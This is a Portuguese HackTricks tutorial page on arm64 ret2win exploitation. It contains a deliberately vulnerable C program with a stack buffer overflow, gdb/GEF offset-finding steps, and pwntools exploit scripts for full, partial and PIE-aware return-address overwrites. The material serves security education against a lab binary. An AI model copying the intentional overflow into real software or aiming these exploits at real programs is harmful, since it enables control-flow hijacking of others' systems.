mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-20 18:14:15 +00:00
197 lines
6.9 KiB
Markdown
197 lines
6.9 KiB
Markdown
|
# Ret2win - arm64
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
Encontre uma introdução ao arm64 em:
|
||
|
|
||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
## Código 
|
||
|
```c
|
||
|
#include <stdio.h>
|
||
|
#include <unistd.h>
|
||
|
|
||
|
void win() {
|
||
|
printf("Congratulations!\n");
|
||
|
}
|
||
|
|
||
|
void vulnerable_function() {
|
||
|
char buffer[64];
|
||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||
|
}
|
||
|
|
||
|
int main() {
|
||
|
vulnerable_function();
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
Compile sem pie e canário:
|
||
|
```bash
|
||
|
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
|
||
|
```
|
||
|
## Encontrando o offset
|
||
|
|
||
|
### Opção de padrão
|
||
|
|
||
|
Este exemplo foi criado usando [**GEF**](https://github.com/bata24/gef):
|
||
|
|
||
|
Inicie o gdb com gef, crie um padrão e use-o:
|
||
|
```bash
|
||
|
gdb -q ./ret2win
|
||
|
pattern create 200
|
||
|
run
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1205).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
arm64 tentará retornar ao endereço no registrador x30 (que foi comprometido), podemos usar isso para encontrar o deslocamento do padrão:
|
||
|
```bash
|
||
|
pattern search $x30
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1206).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
**O deslocamento é 72 (9x48).**
|
||
|
|
||
|
### Opção de deslocamento da pilha
|
||
|
|
||
|
Comece obtendo o endereço da pilha onde o registrador pc está armazenado:
|
||
|
```bash
|
||
|
gdb -q ./ret2win
|
||
|
b *vulnerable_function + 0xc
|
||
|
run
|
||
|
info frame
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1207).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
Agora defina um ponto de interrupção após o `read()` e continue até que o `read()` seja executado e defina um padrão como 13371337:
|
||
|
```
|
||
|
b *vulnerable_function+28
|
||
|
c
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1208).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
Encontre onde este padrão está armazenado na memória:
|
||
|
|
||
|
<figure><img src="../../../.gitbook/assets/image (1209).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
Então: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
|
||
|
|
||
|
<figure><img src="../../../.gitbook/assets/image (1210).png" alt="" width="339"><figcaption></figcaption></figure>
|
||
|
|
||
|
## Sem PIE
|
||
|
|
||
|
### Regular
|
||
|
|
||
|
Obtenha o endereço da função **`win`**:
|
||
|
```bash
|
||
|
objdump -d ret2win | grep win
|
||
|
ret2win: file format elf64-littleaarch64
|
||
|
00000000004006c4 <win>:
|
||
|
```
|
||
|
Exploit:
|
||
|
```python
|
||
|
from pwn import *
|
||
|
|
||
|
# Configuration
|
||
|
binary_name = './ret2win'
|
||
|
p = process(binary_name)
|
||
|
|
||
|
# Prepare the payload
|
||
|
offset = 72
|
||
|
ret2win_addr = p64(0x00000000004006c4)
|
||
|
payload = b'A' * offset + ret2win_addr
|
||
|
|
||
|
# Send the payload
|
||
|
p.send(payload)
|
||
|
|
||
|
# Check response
|
||
|
print(p.recvline())
|
||
|
p.close()
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1211).png" alt="" width="375"><figcaption></figcaption></figure>
|
||
|
|
||
|
### Off-by-1
|
||
|
|
||
|
Na verdade, isso vai ser mais como um off-by-2 no PC armazenado na pilha. Em vez de sobrescrever todo o endereço de retorno, vamos sobrescrever **apenas os últimos 2 bytes** com `0x06c4`.
|
||
|
```python
|
||
|
from pwn import *
|
||
|
|
||
|
# Configuration
|
||
|
binary_name = './ret2win'
|
||
|
p = process(binary_name)
|
||
|
|
||
|
# Prepare the payload
|
||
|
offset = 72
|
||
|
ret2win_addr = p16(0x06c4)
|
||
|
payload = b'A' * offset + ret2win_addr
|
||
|
|
||
|
# Send the payload
|
||
|
p.send(payload)
|
||
|
|
||
|
# Check response
|
||
|
print(p.recvline())
|
||
|
p.close()
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1212).png" alt="" width="375"><figcaption></figcaption></figure>
|
||
|
|
||
|
Você pode encontrar outro exemplo de off-by-one em ARM64 em [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), que é um verdadeiro off-by-**one** em uma vulnerabilidade fictícia.
|
||
|
|
||
|
## Com PIE
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Compile o binário **sem o argumento `-no-pie`**
|
||
|
{% endhint %}
|
||
|
|
||
|
### Off-by-2
|
||
|
|
||
|
Sem um leak, não sabemos o endereço exato da função vencedora, mas podemos saber o deslocamento da função em relação ao binário e, sabendo que o endereço de retorno que estamos sobrescrevendo já está apontando para um endereço próximo, é possível vazar o deslocamento para a função win (**0x7d4**) neste caso e apenas usar esse deslocamento:
|
||
|
|
||
|
<figure><img src="../../../.gitbook/assets/image (1213).png" alt="" width="563"><figcaption></figcaption></figure>
|
||
|
```python
|
||
|
from pwn import *
|
||
|
|
||
|
# Configuration
|
||
|
binary_name = './ret2win'
|
||
|
p = process(binary_name)
|
||
|
|
||
|
# Prepare the payload
|
||
|
offset = 72
|
||
|
ret2win_addr = p16(0x07d4)
|
||
|
payload = b'A' * offset + ret2win_addr
|
||
|
|
||
|
# Send the payload
|
||
|
p.send(payload)
|
||
|
|
||
|
# Check response
|
||
|
print(p.recvline())
|
||
|
p.close()
|
||
|
```
|
||
|
{% hint style="success" %}
|
||
|
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Suporte ao HackTricks</summary>
|
||
|
|
||
|
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|